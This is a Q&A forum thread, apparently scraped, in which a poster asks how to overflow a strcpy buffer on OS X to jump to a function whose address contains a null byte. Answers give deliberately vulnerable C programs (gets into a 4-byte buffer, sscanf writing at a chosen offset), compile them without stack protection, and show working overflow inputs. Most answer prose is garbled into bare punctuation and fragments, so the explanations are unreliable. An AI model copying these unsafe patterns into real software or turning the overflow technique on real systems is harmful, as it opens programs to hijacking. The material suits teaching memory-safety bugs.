Buffer overflow return address has 00

I was just trying to get a buffer overflow working on OSX (10.6) with the following program; I need to execute foo by overflowing the buffer.

#include <string.h>
#include <stdio.h>

void foo() {
    printf("hacked!");
}

int main(int argc, const char *argv[]) {
    char s[100];
    strcpy(s, argv[1]);   /* unbounded copy of argv[1] into a 100-byte buffer: the overflow target */
    return 0;
}

I compile it as:

$ gcc -o test test.c -arch i386

When disassembling test, I get the address of foo as 0x00001eda. The operation is not working properly, probably because the return address must be filled using 0x00001eda, which contains \x00.

In cases where the destination address has \x00, how can a buffer overflow exploit be performed?

+5
3 answers

strcpy() , (\x00). , , , , - .

- OS X 10.6, 64- Windows 7 GCC 4.5.2 (MinGW 32-bit). gdb, foo(), . , gdb , .


1

#include <stdio.h>

int main()
{
    char s[4];
    gets(s);   /* no length limit: anything beyond 4 bytes overflows s */
}

, .

gcc -g -fno-stack-protector -o test test.c
printf 1234567890abcdef\xc6\x13\x30 |./test
!


2

#include <stdio.h>
#include <stdlib.h>

int main(int argc, const char *argv[])
{
    char s[100];
    /* writes the hex value from argv[2] at the byte offset given by argv[1];
       an offset past 100 lands outside s */
    sscanf(argv[2], "%x", &s[atoi(argv[1])]);
}

atoi() " ". , .

gcc -g -fno-stack-protector -o test test.c
./test 112 4013c6
!

+2

- strcpy, , .

, , .

+1

, ( , ) , , .

, (0x00001eda) :

0xda, 0x1e, 0x00, 0x00

, karlphillip. . . strcpy (\x00). strcpy 3 . , , 4- \x00, 4- \x00?

, .

+1